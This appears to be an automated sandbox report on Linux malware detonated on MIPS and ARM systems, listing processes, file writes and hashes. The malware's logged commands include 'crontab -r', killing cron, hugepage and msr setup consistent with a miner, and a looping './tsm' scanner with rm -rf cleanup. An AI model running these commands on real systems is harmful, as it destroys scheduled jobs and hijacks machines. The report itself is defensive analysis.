[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
Network
Files
Analysis: behavioral21
Detonation Overview
Submitted
2024-06-28 12:54
Reported
2024-06-28 12:57
Platform
debian9-mipsbe-20240611-en
Max time kernel
2s
Command Line
Signatures
Processes
/tmp/.rsync/c/golan
[/tmp/.rsync/c/golan]
Network
Files
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-28 12:54
Reported
2024-06-28 12:57
Platform
debian9-armhf-20240611-en
Max time kernel
17s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/.rsync/a/upd | /tmp/.rsync/a/upd | N/A |
Enumerates running processes
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /bin/cat | N/A |
| File opened for reading | /proc/cpuinfo | /bin/cat | N/A |
Reads CPU attributes
| Description | Indicator | Process | Target |
| File opened for reading | /sys/devices/system/cpu/online | /sbin/sysctl | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /usr/bin/pkill | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /bin/ps | N/A |
Enumerates kernel/hardware configuration
| Description | Indicator | Process | Target |
| File opened for reading | /sys/devices/system/node | /tmp/.rsync/a/a | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/150/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/22/stat | /bin/ps | N/A |
| File opened for reading | /proc/138/status | /bin/ps | N/A |
| File opened for reading | /proc/22/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/700/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/314/status | /bin/ps | N/A |
| File opened for reading | /proc/8/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/301/status | /bin/ps | N/A |
| File opened for reading | /proc/6/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/275/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/690/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/29/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/668/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/165/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/314/stat | /bin/ps | N/A |
| File opened for reading | /proc/411/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/4/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/460/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/217/stat | /bin/ps | N/A |
| File opened for reading | /proc/691/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/699/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/41/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/29/stat | /bin/ps | N/A |
| File opened for reading | /proc/sys/kernel/osrelease | /sbin/sysctl | N/A |
| File opened for reading | /proc/672/status | /bin/ps | N/A |
| File opened for reading | /proc/13/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/147/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/278/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/25/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/691/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/killall | N/A |
| File opened for reading | /proc/97/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/415/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/701/status | /bin/ps | N/A |
| File opened for reading | /proc/41/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/668/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/269/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/28/stat | /bin/ps | N/A |
| File opened for reading | /proc/3/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/670/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/sys/kernel/pid_max | /bin/ps | N/A |
| File opened for reading | /proc/23/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/41/stat | /bin/ps | N/A |
| File opened for reading | /proc/13/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/4/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/643/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/13/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/696/stat | /bin/ps | N/A |
| File opened for reading | /proc/28/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/22/status | /bin/ps | N/A |
| File opened for reading | /proc/41/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/461/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/646/stat | /bin/ps | N/A |
| File opened for reading | /proc/672/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/15/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/11/stat | /bin/ps | N/A |
| File opened for reading | /proc/13/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/669/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/15/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/275/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/415/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/147/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/217/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/3/status | /usr/bin/pkill | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/.rsync/a/upd | /tmp/.rsync/a/a | N/A |
| File opened for modification | /tmp/.rsync/a/.proc | /tmp/.rsync/a/stop | N/A |
| File opened for modification | /tmp/.rsync/a/dir.dir | /tmp/.rsync/a/run | N/A |
| File opened for modification | /tmp/.rsync/a/bash.pid | /tmp/.rsync/a/run | N/A |
| File opened for modification | /tmp/.rsync/a/dir.dir | /tmp/.rsync/a/a | N/A |
Processes
/tmp/.rsync/a/a
[/tmp/.rsync/a/a]
/usr/bin/crontab
[crontab -r]
/bin/cat
[cat dir.dir]
/usr/bin/nproc
[nproc]
/sbin/sysctl
[sysctl -w vm.nr_hugepages=1]
/usr/bin/find
[find /sys/devices/system/node/node* -maxdepth 0 -type d]
/sbin/modprobe
[modprobe msr]
/bin/cat
[cat /proc/cpuinfo]
/bin/grep
[grep AMD Ryzen]
/bin/cat
[cat /proc/cpuinfo]
/bin/grep
[grep Intel]
/bin/chmod
[chmod u+x upd]
/bin/chmod
[chmod 777 a anacron cron dir.dir run stop upd]
/tmp/.rsync/a/upd
[./upd]
/tmp/.rsync/a/run
[./run]
/tmp/.rsync/a/stop
[./stop]
/usr/bin/pkill
[pkill -9 cron]
/usr/bin/killall
[killall -9 cron]
/bin/ps
[ps x]
/bin/grep
[grep cron]
/bin/grep
[grep -v grep]
/usr/bin/awk
[awk {print $1}]
/bin/rm
[rm -rf .proc]
/bin/sleep
[sleep 10]
/bin/cat
[cat dir.dir]
/bin/uname
[uname -m]
Network
Files
/tmp/.rsync/a/dir.dir
| MD5 | b3d878adcf4672bbd1f31cffac10c769 |
| SHA1 | ce5798837933ece35a7e26a0a3dc06cab19c6275 |
| SHA256 | ea5fce19c5fbbbc6c3c36eb9e8e295dfb525e9669aafaf8abe9ddb4e00e345c7 |
| SHA512 | 019d21a618b3ccc70c0c7ede225cbbb704e2b448048586c44c74c81a747129da9f3f9675f2a29363af320d2684974a1ff00ac608c53de4458aeacd3ed4f9da2c |
/tmp/.rsync/a/upd
| MD5 | a136fbe534c2487d3c89bd6a26847bd0 |
| SHA1 | 11b9362ba79b67dd5d5baf7cf11e0003f049d6e0 |
| SHA256 | 419a443ff93475ef3abb6e71e5a94e56aea8b7c1f1c4402b3662425815432d46 |
| SHA512 | 85047cf9d22037d2581ae41275107b243c0bb3259b57fe46bd3fd04a1abe75a7fdeace8a9eae1fae31349a00183206b40259ab3957db8f4f16a79e67133485e9 |
/tmp/.rsync/a/bash.pid
| MD5 | 68b329da9893e34099c7d8ad5cb9c940 |
| SHA1 | adc83b19e793491b1c6ea0fd8b46cd9f32e592fc |
| SHA256 | 01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b |
| SHA512 | be688838ca8686e5c90689bf2ab585cef1137c999b48c70b92f67a5c34dc15697b5d11c982ed6d71be1e1e7f7b4e0733884aa97c3f7a339a8ed03577cf74be09 |
Analysis: behavioral8
Detonation Overview
Submitted
2024-06-28 12:54
Reported
2024-06-28 12:57
Platform
debian9-armhf-20240611-en
Max time kernel
10s
Command Line
Signatures
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/.rsync/a/dir.dir | /tmp/.rsync/a/run | N/A |
| File opened for modification | /tmp/.rsync/a/bash.pid | /tmp/.rsync/a/run | N/A |
Processes
/tmp/.rsync/a/run
[/tmp/.rsync/a/run]
/tmp/.rsync/a/stop
[./stop]
/bin/sleep
[sleep 10]
/bin/cat
[cat dir.dir]
/bin/uname
[uname -m]
Network
Files
/tmp/.rsync/a/dir.dir
| MD5 | b3d878adcf4672bbd1f31cffac10c769 |
| SHA1 | ce5798837933ece35a7e26a0a3dc06cab19c6275 |
| SHA256 | ea5fce19c5fbbbc6c3c36eb9e8e295dfb525e9669aafaf8abe9ddb4e00e345c7 |
| SHA512 | 019d21a618b3ccc70c0c7ede225cbbb704e2b448048586c44c74c81a747129da9f3f9675f2a29363af320d2684974a1ff00ac608c53de4458aeacd3ed4f9da2c |
/tmp/.rsync/a/bash.pid
| MD5 | 68b329da9893e34099c7d8ad5cb9c940 |
| SHA1 | adc83b19e793491b1c6ea0fd8b46cd9f32e592fc |
| SHA256 | 01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b |
| SHA512 | be688838ca8686e5c90689bf2ab585cef1137c999b48c70b92f67a5c34dc15697b5d11c982ed6d71be1e1e7f7b4e0733884aa97c3f7a339a8ed03577cf74be09 |
Analysis: behavioral17
Detonation Overview
Submitted
2024-06-28 12:54
Reported
2024-06-28 12:57
Platform
debian9-mipsbe-20240611-en
Max time kernel
149s
Command Line
Signatures
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
Processes
/tmp/.rsync/c/go
[/tmp/.rsync/c/go]
/bin/uname
[uname -m]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
